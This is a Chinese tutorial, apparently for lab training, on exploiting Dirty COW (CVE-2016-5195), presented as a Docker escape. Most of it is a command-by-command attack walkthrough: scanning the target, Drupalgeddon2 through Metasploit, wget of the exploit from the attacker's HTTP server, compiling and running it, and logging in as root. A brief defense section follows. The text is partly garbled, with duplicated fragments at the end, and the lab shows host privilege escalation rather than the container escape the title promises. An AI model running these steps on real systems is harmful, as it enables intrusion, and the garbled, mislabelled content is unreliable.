Docker逃逸之由内核漏洞引起的逃逸(CVE-2016-5195)教学文档<\/h1>

一、Docker逃逸概述<\/h2>

Docker逃逸是指攻击者从容器内部突破隔离限制，获取宿主机权限的行为。目前Docker逃逸主要分为三种类型：<\/p>

由内核漏洞引起<\/strong>：如CVE-2016-5195(Dirty COW)<\/li>
由软件程序漏洞引起<\/strong>：如CVE-2019-5736<\/li>

由配置不当引起<\/strong>：如特权模式(privileged)逃逸、docker remote api未授权访问等<\/li> <\/ol>
二、Dirty COW漏洞(CVE-2016-5195)原理<\/h2>
漏洞原理<\/h3>
Linux内核的内存管理子系统在处理写入时复制(Copy-On-Write, COW)机制时存在竞争条件(race condition)，恶意用户可利用此漏洞获取高权限，对只读内存映射进行写访问。<\/p>
竞争条件是指任务执行顺序异常，可导致应用崩溃或让攻击者执行其他代码。利用此漏洞，攻击者可在目标系统提升权限，甚至获取root权限。<\/p>
影响版本<\/h3>
该漏洞影响全版本Linux系统(Linux kernel >= 2.6.22)<\/p>
三、漏洞利用实战<\/h2>
环境准备<\/h3>

靶机: 192.168.200.49<\/li>
攻击机(Kali): 192.168.200.14<\/li> <\/ul>
信息收集阶段<\/h3>

扫描存活主机<\/strong><\/p>
nmap -sP 192.168.200.0\/24 -T4 <\/span><\/span><\/code><\/pre>通过MAC地址确认靶机IP<\/p> <\/li> 扫描开放端口和服务<\/strong><\/p> nmap -sV -p- 192.168.200.49 <\/span><\/span><\/code><\/pre>确认开放端口：22(SSH)、80(HTTP)、1898(Web服务)<\/p> <\/li> Web应用探测<\/strong><\/p> 访问192.168.200.49:1898<\/li> 确认CMS为Drupal 7<\/li> <\/ul> <\/li> <\/ol> 初始入侵<\/h3> 使用Metasploit利用Drupal漏洞<\/strong><\/p> use exploit\/unix\/webapp\/drupal_drupalgeddon2 <\/span><\/span><\/code><\/pre>获取低权限shell<\/p> <\/li> 转换为交互式shell<\/strong><\/p> exploit\/runshell <\/span><\/span><\/code><\/pre><\/li> <\/ol> 提权准备<\/h3> 查找Dirty COW利用脚本<\/strong><\/p> searchsploit dirty <\/span><\/span>locate linux\/local\/40847.cpp <\/span><\/span><\/code><\/pre><\/li> 复制利用脚本<\/strong><\/p> cp \/usr\/share\/exploitdb\/exploits\/linux\/local\/40847.cpp \/tmp <\/span><\/span><\/code><\/pre><\/li> 在攻击机启动HTTP服务<\/strong><\/p> python -m http.server 8899<\/span> <\/span><\/span><\/code><\/pre><\/li> 靶机下载并编译利用脚本<\/strong><\/p> wget http:\/\/192.168.200.14:8899\/40847.cpp <\/span><\/span>g++ -Wall -pedantic -O2 -std=<\/span>c++11 -pthread -o 40847<\/span> 40847.cpp -lutil <\/span><\/span><\/code><\/pre>编译选项说明：<\/p> -Wall<\/code>: 启用所有警告<\/li> -pedantic<\/code>: 遵循ANSI\/ISO C标准<\/li> -O2<\/code>: 优化级别2<\/li> -std=c++11<\/code>: 使用C++11标准<\/li> -pthread<\/code>: 链接pthread库<\/li> -o 40847<\/code>: 输出文件名<\/li> <\/ul> <\/li> 执行提权脚本<\/strong><\/p> .\/40847 <\/span><\/span><\/code><\/pre>获取root密码：dirtyCowFun<\/p> <\/li> <\/ol> 获取root权限<\/h3> 方法一：直接登录<\/strong><\/p> su root <\/span><\/span>密码：dirtyCowFun <\/span><\/span><\/code><\/pre><\/li> 方法二：SSH远程登录<\/strong><\/p> ssh root@192.168.200.49 <\/span><\/span>密码：dirtyCowFun <\/span><\/span><\/code><\/pre><\/li> 创建交互式shell<\/strong><\/p> python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre>交互式shell对于某些需要用户输入的命令至关重要<\/p> <\/li> <\/ol> 四、漏洞防御措施<\/h2> 及时更新内核<\/strong><\/p> yum update kernel <\/span><\/span>或 <\/span><\/span>apt-get update &&<\/span> apt-get upgrade linux-image-generic <\/span><\/span><\/code><\/pre><\/li> 限制容器能力<\/strong><\/p> 避免使用--privileged<\/code>特权模式<\/li> 使用--cap-drop=ALL<\/code>移除所有能力<\/li> <\/ul> <\/li> 启用SELinux\/AppArmor<\/strong><\/p> # 检查SELinux状态<\/span> <\/span><\/span>sestatus <\/span><\/span><\/code><\/pre><\/li> 定期漏洞扫描<\/strong><\/p> # 使用漏洞扫描工具如lynis<\/span> <\/span><\/span>lynis audit system <\/span><\/span><\/code><\/pre><\/li> <\/ol> 五、总结<\/h2> 通过本教学文档，我们详细了解了：<\/p> Dirty COW漏洞的原理和影响范围<\/li> 完整的信息收集和漏洞利用流程<\/li> 从低权限到root权限的完整提权过程<\/li> 有效的防御措施<\/li> <\/ol> 此漏洞利用展示了内核级漏洞的严重性，强调了及时更新系统和正确配置容器安全的重要性。<\/p>

Docker逃逸之由内核漏洞引起的逃逸(CVE-2016-5195)教学文档<\/h1>

二、Dirty COW漏洞(CVE-2016-5195)原理<\/h2>

影响版本<\/h3> 该漏洞影响全版本Linux系统(Linux kernel >= 2.6.22)<\/p>

三、漏洞利用实战<\/h2>

影响版本<\/h3>
该漏洞影响全版本Linux系统(Linux kernel >= 2.6.22)<\/p>